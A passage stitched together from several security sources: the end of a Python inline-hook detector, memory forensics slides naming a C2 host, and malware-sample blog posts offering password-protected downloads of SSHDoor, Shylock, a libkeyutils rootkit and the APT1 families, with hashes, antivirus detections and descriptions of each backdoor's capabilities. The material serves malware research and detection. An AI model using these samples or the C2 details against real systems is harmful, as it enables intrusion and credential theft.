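    if op == 0xEB and rva + 2 <= len(img):                           # jmp rel8
        rel = struct.unpack_from("<b", img, rva + 1)[0]
        return (va + 2 + rel) & 0xFFFFFFFF
    if op == 0x68 and rva + 6 <= len(img) and img[rva + 5] == 0xC3:  # push imm32 / ret
        return read_u32(img, rva + 1)
    if img[rva:rva + 2] == b"\xff\x25" and rva + 6 <= len(img):      # jmp dword ptr [abs]
        slot = read_u32(img, rva + 2)
        if in_module(slot) and slot + 4 <= MODULE_BASE + MODULE_SIZE:
            return read_u32(img, slot - MODULE_BASE)
        return slot  # pointer slot outside the module: already foreign
    return None


def find_hooks(img, exports):
    """Report every export whose first instruction leaves the module."""
    hooks = []
    for name, rva in sorted(exports.items(), key=lambda kv: kv[1]):
        target = branch_target(img, rva)
        if target is not None and not in_module(target):
            hooks.append(Hook(name, MODULE_BASE + rva, target, img[rva]))
    return hooks


if __name__ == "__main__":
    image, table = make_module()
    for h in find_hooks(image, table):
        print(f"{h.export:16s} {h.va:#010x} -> {h.target:#010x} (opcode {h.opcode:#04x})")
```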
========================
Memory Forensics
* Even powerful rootkits quickly draw your attention.
========================
Memory Forensics
* We can also use the YARA malware identification feature to directly scan for patterns inside a PID or within a specific memory segment. Here we see that injected code inside the SVCHOST process established a connection to dexter.servequake.com:4444 via HTTP and downloaded the 1234567890.functions resource.
========================
Memory Forensics
* For sure, the RAT payload is encrypted, but in a few minutes you have identified the threat and dug quite deeply into the real problem.
========================
Memory Forensics
* You can now extract the guilty binary code along with the related memory segments and begin a classical malware analysis.
========================
Memory Forensics
* And if you like a high-level view for your incident report, why not extend Volatility with Graphviz to make something more visual?
========================
Memory Forensics
* That's it. I hope I have piqued your interest in one of the most important Forensics innovations of the last few years. The whole demo is attached here.
* To learn more:
SANS Forensics 610 Training Course [GREM]
https://www.volatilesystems.com/default/volatility
http://www.microsoft.com/whdc/system/platform/firmware/PECOFF.mspx
http://www.ualberta.ca/CNS/RESEARCH/LinuxClusters/mem.html
http://www.tenouk.com/visualcplusmfc/visualcplusmfc20.html
========================
Table of contents
0x00 - About me
0x01 - About this conference
0x02 - Memory introduction
0x03 - Memory manipulation from an offensive angle
0x04 - Memory manipulation from a defensive angle
0x05 - Conclusion
========================
Conclusion
* I hope I have achieved my goal of opening the doors to a fascinating world which could easily allow security analysts to save lots of time during their recurrent duties...
* ...And that you will see your own systems [and the ones you assess] from a different angle.
* ...And that you will now have the reflex of dumping the whole memory in case of incident.
* ...And that you will reconsider security where the physical aspect is concerned. :-]

JAN 2013 - LINUX SSHDOOR - SAMPLE
February 16, 2013, 6:13 pm

Just a few accumulated samples here, found and shared by others. This one is for the Linux SSHDoor malware, which can steal your SSH passwords.
ESET covered that in detail in Linux/SSHDoor.A Backdoored SSH daemon that steals passwords (24 JAN 2013).
The related Linux.Chapro.A sample was posted earlier this year as well.
Download. Email me if you need the password

Automatic Scans
https://www.virustotal.com/en/file/ebfd9354ed83635ed38bd117b375903f9984a18780ef86dbf7a642fc6584271c/analysis/1361067116/
SHA256: ebfd9354ed83635ed38bd117b375903f9984a18780ef86dbf7a642fc6584271c
SHA1: cb7a464aa8d58f26f6561c32ef4a1464c583a7ca
MD5: 90dc9de5f93b8cc2d70a1be37acea23a
File size: 469.9 KB ( 481200 bytes )
File name: 90DC9DE5F93B8CC2D70A1BE37ACEA23A
File type: ELF
Detection ratio: 22 / 46
Analysis date: 2013-02-17 02:11:56 UTC ( 0 minutes ago )
Avast ELF:SSHDoor-A [Trj] 20130217
AVG BackDoor.Generic_c.FDN 20130216
ClamAV UNIX.Trojan.SSHDoor 20130217
Comodo UnclassifiedMalware 20130217
DrWeb Linux.BackDoor.Ssh 20130215
eSafe Win32.Trojan 20130211
ESET-NOD32 Linux/SSHDoor.A 20130216
F-Secure Backdoor:Linux/SSHDoor.A 20130217
Fortinet Linux/SSh.M!tr.bdr 20130217
GData ELF:SSHDoor-A 20130217
Ikarus Backdoor.Linux.SSh 20130216
Jiangmin Backdoor/Linux.gu 20130216
Kaspersky Backdoor.Linux.SSh.m 20130216
Microsoft Backdoor:Linux/SSHDoor.A 20130217
Norman SSHDoor.A 20130215
PCTools Malware.Linux-SSHDoor 20130217
Symantec Linux.SSHDoor 20130216
TrendMicro ELF_SSHDOOR.A 20130217
TrendMicro-HouseCall ELF_SSHDOOR.A 20130217

JAN 2013 SHYLOCK (SKYPE VERSION) SAMPLE
February 16, 2013, 7:15 pm

In January 2013, Iurii Khvyl and Peter Kruse from CSIS posted an analysis of a Shylock variant capable of spreading through Skype. You can read their research here: Shylock calling Skype. The sample is below.
Download. Email me if you need the password
Sample credit: anonymous

Automatic scans
https://www.virustotal.com/en/file/4bd97130a89c2f9080259d8e87d8d713a23fd0e4336eabb0bf47a44d700ec842/analysis/
SHA256: 4bd97130a89c2f9080259d8e87d8d713a23fd0e4336eabb0bf47a44d700ec842
SHA1: b87948722e04fa3edda45303d20c745a6301e567
MD5: 8fbeb78b06985c3188562e2f1b82d57d
File size: 278.0 KB ( 284672 bytes )
File name: 4bd97130a89c2f9080259d8e87d8d713a23fd0e4336eabb0bf47a44d700ec842
File type: Win32 DLL
Tags: pedll
Detection ratio: 33 / 46
Analysis date: 2013-02-05 19:05:29 UTC ( 1 week, 4 days ago )
AhnLab-V3 Win-Trojan/Caphaw.284672 20130205
AntiVir TR/Skyspy.AJ 20130205
Avast Win32:Shylock-A [Trj] 20130205
AVG Ransomer.BKE 20130205
BitDefender Trojan.Generic.8640212 20130205
CAT-QuickHeal Backdoor.Caphaw 20130205
ClamAV Win.Trojan.Shylock 20130205
Comodo UnclassifiedMalware 20130205
eSafe Win32.Trojan 20130204
ESET-NOD32 Win32/Caphaw.M 20130205
F-Secure Trojan:W32/Agent.DUIE 20130205
Fortinet W32/Shylock.A!tr 20130205
GData Trojan.Generic.8640212 20130205
Ikarus Trojan-Spy.Agent 20130205
Kaspersky Trojan.Win32.Agentb.hxk 20130204
Malwarebytes Trojan.Shylock 20130205
McAfee RDN/Generic.dx!i 20130205
McAfee-GW-Edition RDN/Generic.dx!i 20130205
Microsoft Backdoor:Win32/Caphaw.N 20130205
MicroWorld-eScan Trojan.Generic.8640212 20130205
NANO-Antivirus Trojan.Win32.Caphaw.bevzou 20130205
Norman Shylock.C 20130205
nProtect Trojan.Generic.8640212 20130205
Panda Trj/CI.A 20130205
PCTools Trojan.Generic 20130205
Rising Backdoor.Caphaw!4ED7 20130205
Sophos Troj/Shype-A 20130205
Symantec Trojan Horse 20130205
TheHacker Trojan/Caphaw.gen 20130205
TrendMicro WORM_KEPSY.A 20130205
TrendMicro-HouseCall WORM_KEPSY.A 20130205
VIPRE Trojan.Win32.Generic!BT 20130205
ViRobot Backdoor.Win32.S.Shylock.284672 20130205

LINUX/CENTOS SSHD SPAM EXPLOIT — LIBKEYUTILS.SO.1.9 - SAMPLE
February 20, 2013, 1:39 pm

Someone shared a sample of the Linux rootkit affecting servers running CloudLinux, CentOS & cPanel. Here are the links:
* Feb 20-18 - Webhostingtalk SSHD Rootkit Rolling around
* Feb 18, 2013 0day Linux/CentOS SSHd Spam Exploit — libkeyutils.so.1.9 http://blog.solidshellsecurity.com/
* Feb 8, 2013 SSHD Spam Rootkit /lib64/libkeyutils.so.1.9
Download. Email me if you need the password
Sample credit: anonymous

Automatic scans
https://www.virustotal.com/en/file/afbef5352942dde22e5cfa802c057917fccb17623f3e8ead165fd17371d851f3/analysis/
SHA256: afbef5352942dde22e5cfa802c057917fccb17623f3e8ead165fd17371d851f3
SHA1: 471ee431030332dd636b8af24a428556ee72df37
MD5: ecea5cc15532ffac4b8159bf860c63c1
File size: 27.7 KB ( 28352 bytes )
First seen by VirusTotal: 2013-02-19 14:14:30 UTC ( 1 day, 7 hours ago )
Last seen by VirusTotal: 2013-02-20 18:03:38 UTC ( 3 hours, 57 minutes ago )
File names (max. 25): 1. vti-rescan 2. libkeyutils.so.1.9
File type: ELF
Detection ratio: 3 / 46
Analysis date: 2013-02-20 18:03:38 UTC
AVG Patched_c.NCO 20130220
DrWeb Linux.Sshdkit.1 20130220
ESET-NOD32 Linux/SSHDoor.B 20130220

MANDIANT APT1 SAMPLES CATEGORIZED BY MALWARE FAMILIES
March 3, 2013, 8:46 pm

These are the samples described in the Mandiant Report APT1, in the Indicators of Compromise (IOCs).
Each file is named according to the malware family, so you can run your own detection and signature tools to see how your naming convention corresponds to the one used by Mandiant. You can use these binaries to develop signatures, compare to your samples, or study the behavior and evolution of APT1. I added Contagio samples in several families as well. The list of binaries and their names, as well as malware families descriptions are provided below for your convenience. Download Image may be NSFW. Clik here to view.Download Mandiant report samples. Email me if you need the password Download Contagio samples (Bangat, Mapiget, Kurton, Bicuit, Letsgo) Download additional samples for GCal, GDocupload, Manitsme Sample list and information Below descirptions are from Mandiant IOC http://intelreport.mandiant.com/Mandiant_APT1_Report_Appendix.zip Image may be NSFW. Clik here to view. 1. AURIGA The AURIGA malware family shares a large amount of functionality with the BANGAT backdoor. The malware family contains functionality for keystroke logging, creating and killing processes, performing file system and registry modifications, spawning interactive command shells, performing process injection, logging off the current user or shutting down the local machine. The AURIGA malware contains a driver component which is used to inject the malware DLL into other processes. This driver can also perform process and IP connection hiding. The malware family will create a copy of cmd.exe to perform its C2 activity, and replace the "Microsoft corp" strings in the cmd.exe binary with different values. The malware family typically maintains persistence through installing itself as a service. > AURIGA_sample_6B31344B40E2AF9C9EE3BA707558C14E > AURIGA_sample_CDCD3A09EE99CFF9A58EFEA5CCBE2BED 2. BANGAT The BANGAT malware family shares a large amount of functionality with the AURIGA backdoor. 
The malware family contains functionality for keylogging, creating and killing processes, performing filesystem and registry modifications, spawning interactive command shells, performing process injection, logging off the current user or shutting down the local machine. In addition, the malware also implements a custom VNC like protocol which sends screenshots of the desktop to the C2 server and accepts keyboard and mouse input. The malware communicates to its C2 servers using SSL, with self signed SSL certificates. The malware family will create a copy of cmd.exe to perform its C2 activity, and replace the "Microsoft corp" strings in the cmd.exe binary with different values. The malware family typically maintains persistence through installing itself as a service. > BANGAT_sample_4C6BDDCCA2695D6202DF38708E14FC7E > BANGAT_sample_8E8622C393D7E832D39E620EAD5D3B49 > BANGAT_sample_468FF2C12CFFC7E5B2FE0EE6BB3B239E > BANGAT_sample_727A6800991EEAD454E53E8AF164A99C > BANGAT_sample_BD8B082B7711BC980252F988BB0CA936 > BANGAT_sample_DB05DF0498B59B42A8E493CF3C10C578 > BANGAT_sample_E1B6940985A23E5639450F8391820655 > BANGAT_sample_EF8E0FB20E7228C7492CCDC59D87C690 Contagio samples for Bangat Circa 2009-2010 995B44EF8460836D9091A8B361FDE489_rasauto32.dll F10D145684BA6C71CA2D2F7EB0D89343_rasauto32.dll 43CE605B2584C27064FEBB0474A787A4_irmon32.dll 1966B265272E1660E6F340B19A7E5567_irmon32.dll 423A30C077B12354A4A5C31D4DE99689_irmon32.dll 80CA8B948409138BE40FFBC5D6D95EF1_rasauto16.dll 15138604260B1D27F92BF1EC6468B326_rasauto16.dll 616B0F00DE54D7501CEEE18823F72103_rasauto16.dll C75D351D86DE26718A3881F62FDDDE99_irmon32.dll E66DD357A6DFA6EBD15358E565E8F00F_irmon32.dll 0F77AF7FA673F5B3D36B926576002A1C_winhlp32.exe 3. BISCUIT BISCUIT provides attackers with full access to an infected host. BISCUIT capabilities include launching an interactive command shell, enumerating servers on a Windows network, enumerating and manipulating process, and transferring files. 
BISCUIT communicates using a custom protocol, which is then encrypted using SSL. Once installed, BISCUIT will attempt to beacon to its command/control servers approximately every 10 or 30 minutes. It will beacon its primary server first, followed by a secondary server. All communication is encrypted with SSL (OpenSSL 0.9.8i).

> BISCUIT_sample_5A728CB9CE56763DCCB32B5298D0F050
> BISCUIT_sample_5D8129BE965FAB8115ECA34FC84BD7F0
> BISCUIT_sample_7CB055AC3ACBF53E07E20B65EC9126A1
> BISCUIT_sample_12F25CE81596AEB19E75CC7EF08F3A38
> BISCUIT_sample_43B844C35E1A933E9214588BE81CE772
> BISCUIT_sample_70A55FDC712C6E31E013E6B5D412B0D6
> BISCUIT_sample_268EEF019BF65B2987E945AFAF29643F
> BISCUIT_sample_15901DDBCCC5E9E0579FC5B42F754FE8
> BISCUIT_sample_034374DB2D35CF9DA6558F54CEC8A455
> BISCUIT_sample_DA383CC098A5EA8FBB87643611E4BFB6

Contagio samples for BISCUIT:

03B3CCEB253FD782590CF0EFAFD49D5F_AcroRD32.exe
8AA320A3D34CF89EF63BF801DD497490_qmqrproxy.dll

4. BOUNCER

BOUNCER will load an extracted DLL into memory, and then will call the DLL's dump export. The dump export is called with the parameters passed via the command line to the BOUNCER executable. It requires at least two arguments, the IP and port to send the password dump information to. It can accept at most five arguments, including a proxy IP, port and an X.509 key for SSL authentication. The DLL backdoor has the capability to execute arbitrary commands, collect database and server information, brute force SQL login credentials, launch arbitrary programs, create processes and threads, delete files, and redirect network traffic.

> BOUNCER_sample_6EBD05A02459D3B22A9D4A79B8626BF1
> BOUNCER_sample_57353ECBAECE29ECAF8025231EB930E3
> BOUNCER_sample_CF038194F0FE222F31EC24CB80941BB1
> BOUNCER_sample_D2F1BE7E10ED39AA8BC0F7F671D824D2
> BOUNCER_sample_F90DA15F862BB8452FC51D3F0DBB3373

5. CALENDAR

This family of malware uses Google Calendar to retrieve commands and send results.
It retrieves event feeds associated with Google Calendar, where each event contains commands from the attacker for the malware to perform. Results are posted back to the event feed. The malware authenticates with Google using hard-coded email addresses and passwords. The malware uses the deprecated ClientLogin authentication API from Google. The malware is registered as a service DLL as a persistence mechanism. Artifacts of this may be found in the registry.

GCAL_sample_72d4be67abeaa6ab3827784317b1b7e9

6. COMBOS

The COMBOS malware family is an HTTP-based backdoor. The backdoor is capable of file upload, file download, spawning an interactive reverse shell, and terminating its own process. The backdoor may decrypt stored Internet Explorer credentials from the local system and transmit the credentials to the C2 server. The COMBOS malware family does not have any persistence mechanisms built into itself.

> COMBOS_sample_1E3719BBF854417384A3768E4326584B
> COMBOS_sample_EC1E62EF73D844C6C845ACDD4C1F9CE7
> COMBOS_sample_FA14D823A5D1854131DB0DC9EEF27022

7. COOKIEBAG aka TROJAN.COOKIES
http://www.cyberengineeringservices.com/trojan-cookies/

This family of malware is a backdoor capable of file upload and download as well as providing remote interactive shell access to the compromised machine. Communication with the Command & Control (C2) servers uses a combination of single-byte XOR and Base64 encoded data in the Cookie and Set-Cookie HTTP header fields. Communication with the C2 servers is over port 80. Some variants install a registry key as a means of persistence. The hardcoded strings cited include a command string in common with several other APT1 families.
> COOKIEBAG_sample_0C28AD34F90950BC784339EC9F50D288
> COOKIEBAG_sample_321D75C9990408DB812E5A248A74F8C8
> COOKIEBAG_sample_543E03CC5872E9ED870B2D64363F518B
> COOKIEBAG_sample_989B797C2A63FBFC8E1C6E8A8CCD6204
> COOKIEBAG_sample_57326CD78A56D26E349BBD4BCC5B9FA2
> COOKIEBAG_sample_DB2580F5675F04716481B24BB7AF468E
> COOKIEBAG_sample_F3611C5C793F521F7FF2A69C22D4174E

7. DAIRY

Members of this malware family are backdoors that provide file downloading, process listing, process killing, and reverse shell capabilities. This malware may also add itself to the Authorized Applications list for the Windows Firewall.

> DAIRY_sample_995442F722CC037885335340FC297EA0

8. GETMAIL

Members of this family of malware are utilities designed to extract email messages and attachments from Outlook PST files. One part of this utility set is an executable, the other is a DLL. The malware may create a registry artifact related to the executable.

> GETMAIL_sample_909BEF6DB8D33854E983EBCCDD71419F
> GETMAIL_sample_E81DB0198D2A63C4CCFC33F58FCB821E
> GETMAIL_sample_E212AAF642D73A2E4A885F12EEA86C58

9. GDOCUPLOAD

This family of malware is a utility designed to upload files to Google Docs. Nearly all communications with docs.google.com are SSL encrypted. The malware does not use Google's published API to interact with their services. The malware does not currently work with Google Docs: it does not detect HTTP 302 redirections and will get caught in an infinite loop attempting to parse results from Google that are not present.

> GDOCUPLOAD-sample_232d1be2d8cbbd1cf57494a934628504

10. GLOOXMAIL aka TROJAN.GTALK
http://www.cyberengineeringservices.com/trojan-gtalk/

GLOOXMAIL communicates with Google's Jabber/XMPP servers and authenticates with a hard-coded username and password. The malware can accept commands over XMPP that include file upload and download, providing a remote shell, sending process listings, and terminating specified processes.
The malware makes extensive use of the open source gloox library (http://camaya.net/gloox/, version 0.9.9.12) to communicate using the Jabber/XMPP protocol. All communications with the Google XMPP server are encrypted.

> GLOOXMAIL_sample_3DE1BD0F2107198931177B2B23877DF4
> GLOOXMAIL_sample_15A33F8FE11B94BDD38BFF651F6A5CD1

11. GOGGLES aka TROJAN.FOXY
http://www.cyberengineeringservices.com/trojan-foxy-des/

A family of downloader malware that retrieves an encoded payload from a fixed location, usually in the form of a file with a .jpg extension. Some variants have just an .exe that acts as a downloader; others have an .exe launcher that runs as a service and then loads an associated .dll of the same name that acts as the downloader. This IOC is targeted at the downloaders only. After downloading the file, the malware decodes the downloaded payload into an .exe file and launches it. The malware usually stages the files it uses in the %TEMP% directory or the %WINDIR%\Temp directory.

> GOGGLES_sample_09D372E4259980AC95FDADF1846578D9
> GOGGLES_sample_57F98D16AC439A11012860F88DB21831
> GOGGLES_sample_51326BF40DA5A5357A143DD9A6E6A11C
> GOGGLES_sample_A5B581C0600815B1112CA2FED578928B
> GOGGLES_sample_BCB087F69792B69494A3EDAD51A842BB
> GOGGLES_sample_BF80DBF969B73790253F683CD723FD71
> GOGGLES_sample_DB50416D9E67F4982E89E0FFB0ADE6F3

12. GREENCAT

Members of this family are full-featured backdoors that communicate with a Web-based Command & Control (C2) server over SSL. Features include an interactive shell, gathering system info, uploading and downloading files, and creating and killing processes. Malware in this family usually communicates with a hard-coded domain using SSL on port 443. Some members of this family rely on launchers to establish a persistence mechanism for them. Others contain functionality that allows them to install themselves, replacing an existing Windows service, and to uninstall themselves.
Several variants use %SystemRoot%\Tasks or %WinDir%\Tasks as working directories; additional malware artifacts may be found there.

> GREENCAT_sample_0C5E9F564115BFCBEE66377A829DE55F
> GREENCAT_sample_1F92FF8711716CA795FBD81C477E45F5
> GREENCAT_sample_3E6ED3EE47BCE9946E2541332CB34C69
> GREENCAT_sample_3E69945E5865CCC861F69B24BC1166B6
> GREENCAT_sample_5AEAA53340A281074FCB539967438E3F
> GREENCAT_sample_6D2320AF561B2315C1241E3EFD86067F
> GREENCAT_sample_30E78D186B27D2023A2A7319BB679C3F
> GREENCAT_sample_36C0D3F109AEDE4D76B05431F8A64F9E
> GREENCAT_sample_55FB1409170C91740359D1D96364F17B
> GREENCAT_sample_57E79F7DF13C0CB01910D0C688FCD296
> GREENCAT_sample_120C2E085992FF59A21BA401EC29FEC9_different
> GREENCAT_sample_390D1F2A620912104F53C034C8AEF14B
> GREENCAT_sample_871CC547FEB9DBEC0285321068E392B8
> GREENCAT_sample_7388D67561D0A7989202AD4D37EFF24F
> GREENCAT_sample_A99E06E2F90DB4E506EF1347A8774DD5
> GREENCAT_sample_A565682D8A13A5719977223E0D9C7AA4
> GREENCAT_sample_AB208F0B517BA9850F1551C9555B5313
> GREENCAT_sample_B3BC979D8DE3BE09728C5DE1A0297C4B
> GREENCAT_sample_B5E9CE72771217680EFAEECFAFE3DA3F
> GREENCAT_sample_B8F61242E28F2EDF6CB1BE8781438491
> GREENCAT_sample_BA0C4D3DBF07D407211B5828405A9B91
> GREENCAT_sample_C044715C2626AB515F6C85A21C47C7DD
> GREENCAT_sample_E54CE5F0112C9FDFE86DB17E85A5E2C5
> GREENCAT_sample_E83F60FB0E0396EA309FAF0AED64E53F
> GREENCAT_sample_F4ED3B7A8A58453052DB4B5BE3707342
> GREENCAT_sample_FAB6B0B33D59F393E142000F128A9652

13. HACKFASE

This family of malware is a backdoor that provides reverse shell, process creation, system statistics collection, process enumeration, and process termination capabilities. This family is designed to be a service DLL and does not contain an installation mechanism. It usually communicates over port 443. Some variants use their own encryption, others use SSL.
> HACKFASE_sample_0D0240672A314A7547D328F824642DA8
> HACKFASE_sample_1A0C7E61BCC50D57B7BCF9D9AF691DE5
> HACKFASE_sample_9E860622FEE66074DFE81DCFCC40C4E2
> HACKFASE_sample_17199DDAC616938F383A0339F416C890
> HACKFASE_sample_BCBDEF1678049378BE04719ED29078D2

14. HELAUTO

This family of malware is designed to operate as a service and provides remote command execution and file transfer capabilities to a fixed IP address or domain name. All communication with the C2 server happens over port 443 using SSL. This family can be installed as a service DLL. Some variants allow for uninstallation.

> HELAUTO_sample_47E7F92419EB4B98FF4124C3CA11B738
> HELAUTO_sample_DA6B0EE7EC735029D1FF4FA863A71DE8

15. KURTON

This family of malware is a backdoor that tunnels its connection through a preconfigured proxy. The malware communicates with a remote command and control server over HTTPS via the proxy. The malware installs itself as a Windows service with a service name supplied by the attacker, but defaults to IPRIP if no service name is provided during install.

No Mandiant samples available. These are Contagio samples dated 2009:

57C69FECFECDCB5288687DF2AC96E44F_iprinp.dll
7C136A9E8D94BF117288D9B5388019D6_iprinp.dll
82C39E6979022E57B93B719793B39A30_iprinp.dll
A327B9D97CA479B89297F438F87816A0_iprinp.dll
A6C1595BD7B1A85C42FBD674460DC35D_iprinp.dll

15. LIGHTBOLT

LIGHTBOLT is a utility with the ability to perform HTTP GET requests for a list of user-specified URLs. The responses of the HTTP requests are then saved as MHTML files, which are added to encrypted RAR files. LIGHTBOLT has the ability to use software certificates for authentication.

> LIGHTBOLT_sample_2E86A9862257A0CF723CEEF3868A1A12

16. LIGHTDART

LIGHTDART is a tool used to access a pre-configured web page that hosts an interface to query a database or data set. The tool then downloads the results of a query against that web page to an encrypted RAR file.
This RAR file (1.rar) is renamed and uploaded to an attacker-controlled FTP server, or uploaded via an HTTP POST with a .jpg extension. The malware will execute this search once a day. The target webpage usually contains information useful to the attacker, which is updated on a regular basis. Examples of targeted information include weather information or ship coordinates.

No samples.

17. LONGRUN

LONGRUN is a backdoor designed to communicate with a hard-coded IP address and provide the attackers with a custom interactive shell. It supports file uploads and downloads, and executing arbitrary commands on the compromised machine. When LONGRUN executes, it first loads configuration data stored as an obfuscated string inside the PE resource section. The distinctive string thequickbrownfxjmpsvalzydg is used as part of the input to the decoding algorithm. When the configuration data string is decoded it is parsed and treated as an IP and port number. The malware then connects to the host and begins interacting with it over a custom protocol.

No samples.

18. MANITSME

This family of malware will beacon out at random intervals to the remote attacker. The attacker can run programs, execute arbitrary commands, and easily upload and download files. This IOC looks for both the dropper file and the backdoor.

> MANITSME_sample_e97ebb5b2050b86999c55797c2348ba7

19. MAPIGET

As seen here: http://contagiodump.blogspot.com/2010/06/these-days-i-see-spike-in-number-of.html

This malware utility is a set of two files that operate in conjunction to extract email messages and attachments from an Exchange server. In order to operate successfully, these programs require authentication credentials for a user on the Exchange server, and must be run from a machine joined to the domain that has Microsoft Outlook installed (or equivalent software that provides the Microsoft 'Messaging API' (MAPI) service).
> MAPIGET_sample_C627E595C9EC6DC2199447AEAB59AC03
> MAPIGET_sample_F3C6C797EF80787E6CBEEAA77496A3CB

Contagio samples for MAPIGET:

09E25BB934D8523FCCD27B86FBF4F8CE_m.exe
C57902ACE7FF4173AE41F1292EA85E2A_MAPI.exe

20. MINIASP

This family of malware consists of backdoors that attempt to fetch encoded commands over HTTP. The malware is capable of downloading a file, downloading and executing a file, executing arbitrary shell commands, or sleeping a specified interval.

> MINIASP_77FBFED235D6062212A3E43211A5706E
> MINIASP_81B03CBCFC4B9D090CD8F5E5DA816895
> MINIASP_E476E4A24F8B4FF4C8A0B260AA35FC9F

21. NEWSREELS

The NEWSREELS malware family is an HTTP-based backdoor. When first started, NEWSREELS decodes two strings from its resources section. These strings are both used as C2 channels: one URL is used as a beacon URL (transmitting) and the second URL is used to get commands (receiving). The NEWSREELS malware family is capable of performing file uploads, downloads, creating processes or creating an interactive reverse shell.

> NEWSREELS_sample_02C65973B6018F5D473D701B3E7508B2
> NEWSREELS_sample_2C49F47C98203B110799AB622265F4EF
> NEWSREELS_sample_270D42F292105951EE81E4085EA45054
> NEWSREELS_sample_0496E3B17CF40C45F495188A368C203A
> NEWSREELS_sample_523F56515221161579EE6090C962E5B1
> NEWSREELS_sample_933B11BC4799F8D9F65466FB2E3EA659
> NEWSREELS_sample_A2CD1189860B9BA214421AAB86ECBC8A
> NEWSREELS_sample_A639F598D4C0B9AA7A4691D05F27D977
> NEWSREELS_sample_AF2F7B070245C90BD2A0A0845314173A
> NEWSREELS_sample_B8277CCE81E0A372BC35D33A0C9483C2
> NEWSREELS_sample_BAABD9B76BFF84ED27FD432CFC6DF241
> NEWSREELS_sample_D4C7F1F80883412F9796F1270ACCFF50
> NEWSREELS_sample_D271AE0F4E9230AF3B61EAFE7F671FDE
> NEWSREELS_sample_EF6C375E3E6930E2B50E1E97FE6FBCC9

22. SEASALT

The SEASALT malware family communicates via a custom binary protocol.
It is capable of gathering some basic system information, file system manipulation, file upload and download, process creation and termination, and spawning an interactive reverse shell. The malware maintains persistence by installing itself as a service.

> SEASALT_sample_5E0DF5B28A349D46AC8CC7D9E5E61A96
> SEASALT_sample_F0726AADCF5D66DAF528F79BA8507113

23. STARSYPOUND

STARSYPOUND provides an interactive remote shell over an obfuscated communications channel. When it is first run, it loads a string (from the executable PE resource section) containing the beacon IP address and port. The malware sends the beacon string "*(SY)# <HOSTNAME>" to the remote system, where <HOSTNAME> is the hostname of the victim system. The remote host responds with a packet that also begins with the string "*(SY)# cmd". This causes the malware to launch a new cmd.exe child process. Further communications are forwarded to the cmd.exe child process to execute. The commands sent to the shell and their responses are obfuscated when sent over the network.

> STARSYPOUND_sample_2BA0D0083976A5C1E3315413CDCFFCD2
> STARSYPOUND_sample_2DD892986B2249B5214639ECC8AC0223
> STARSYPOUND_sample_8B75BCBFF174C25A0161F30758509A44
> STARSYPOUND_sample_9EA3C16194CE354C244C1B74C46CD92E
> STARSYPOUND_sample_6576C196385407B0F7F4B1B537D88983
> STARSYPOUND_sample_C0A33A1B472A8C16123FD696A5CE5EBB
> STARSYPOUND_sample_CA6FE7A1315AF5AFEAC2961460A80569
> STARSYPOUND_sample_D9FBF759F527AF373E34673DC3ACA462
> STARSYPOUND_sample_EC8AA67B05407C01094184C33D2B5A44

24. SWORD

This family of malware provides a backdoor over the network to the attackers. It is configured to connect to a single host and offers file download over HTTP, program execution, and arbitrary execution of commands through a cmd.exe instance.

> SWORD_sample_052F5DA1734464A985DCD669BFF62F93
25. TABMSGSQL aka TROJAN LETSGO
http://www.cyberengineeringservices.com/trojan-letsgo-analysis/

This malware family is a full-featured backdoor capable of file uploading and downloading, arbitrary execution of programs, and providing a remote interactive command shell. All communications with the C2 server are sent over HTTP to a static URL, appending various URL parameters to the request. Some variants use a slightly different URL.

> TABMSGSQL_sample_001DD76872D80801692FF942308C64E6
> TABMSGSQL_sample_2F930D92DC5EBC9D53AD2A2B451EBF65
> TABMSGSQL_sample_3E87051B1DC3463F378C7E1FE398DC7D
> TABMSGSQL_sample_8A86DF3D382BFD1E4C4165F4CACFDFF8
> TABMSGSQL_sample_052EC04866E4A67F31845D656531830D
> TABMSGSQL_sample_002325A0A67FDED0381B5648D7FE9B8E
> TABMSGSQL_sample_55886D571C2A57984EA9659B57E1C63A

Contagio sample for TABMSGSQL (LETSGO):

DC1286AAC46B0EAD7B27F045E5B09EFF Conference Materials.zip (dropper)

26. TARSIP-ECLIPSE

The TARSIP malware family is a backdoor which communicates over encoded information in HTTPS headers. Typical TARSIP malware samples will only beacon out to their C2 servers if the C2 DNS address resolves to a specific address. The capability of TARSIP backdoors includes file uploading, file downloading, interactive command shells, process enumeration, process creation, and process termination. The TARSIP-ECLIPSE family is distinguished by the presence of 'eclipse' in .pdb debug strings present in the malware samples. It does not provide a built-in mechanism to maintain persistence.

> TARSIP-ECLIPSE_sample_0B506C6DDE8D07F9EEB82FD01A6F97D4
> TARSIP-ECLIPSE_sample_4A54D7878D4170C3D4E3C3606365C42C
> TARSIP-ECLIPSE_sample_4F763B07A7B8A80F1F9408E590F79532
> TARSIP-ECLIPSE_sample_3107DE21E480AB1F2D67725F419B28D0
> TARSIP-ECLIPSE_sample_8934AEED5D213FE29E858EEE616A6EC7
> TARSIP-ECLIPSE_sample_123505024F9E5FF74CB6AA67D7FCC392
> TARSIP-ECLIPSE_sample_CA327BC83FBE38B3689CD1A5505DFC33
27. TARSIP-MOON

The TARSIP malware family is a backdoor which communicates over encoded information in HTTPS headers. Typical TARSIP malware samples will only beacon out to their C2 servers if the C2 DNS address resolves to a specific address. The capability of TARSIP backdoors includes file uploading, file downloading, interactive command shells, process enumeration, process creation, and process termination. The TARSIP-MOON family is distinguished by the presence of 'moon' in .pdb debug strings present in the malware samples. It does not provide a built-in mechanism to maintain persistence.

> TARSIP-MOON_sample_2BD02B41817D227058522CCA40ACD390
> TARSIP-MOON_sample_95F25D3AFC5370F5D9FD8E65C17D3599
> TARSIP-MOON_sample_0908D8B3E459551039BADE50930E4C1B
> TARSIP-MOON_sample_6808EC6DBB23F0FA7637C108F44C5C80
> TARSIP-MOON_sample_A5D4EBC0285F0213E0C29D23BC410889
> TARSIP-MOON_sample_C91EACAB7655870764D13BA741AA9A73

28. WARP

The WARP malware family is an HTTP-based backdoor written in C++, and the majority of its code base is borrowed from source code available in the public domain. Network communications are implemented using the same WWW client library (w3c.cpp) available from www.dankrusi.com/file_69653F3336383837.html. The malware has system survey functionality (collects hostname, current user, system uptime, CPU speed, etc.) taken directly from the BO2K backdoor available from www.bo2k.com. It also contains the hard disk identification code found at www.winsim.com/diskid32/diskid32.cpp. When WARP executes remote commands, the malware creates a copy of the '%SYSTEMROOT%\system32\cmd.exe' file as '%USERPROFILE%\Temp\~ISUN32.EXE'. The version signature information of the duplicate executable is zeroed out. Some WARP variants maintain persistence through the use of DLL search order hijacking.

No sample.

29. WEBC2-ADSPACE

A WEBC2 backdoor is designed to retrieve a Web page from a pre-determined C2 server.
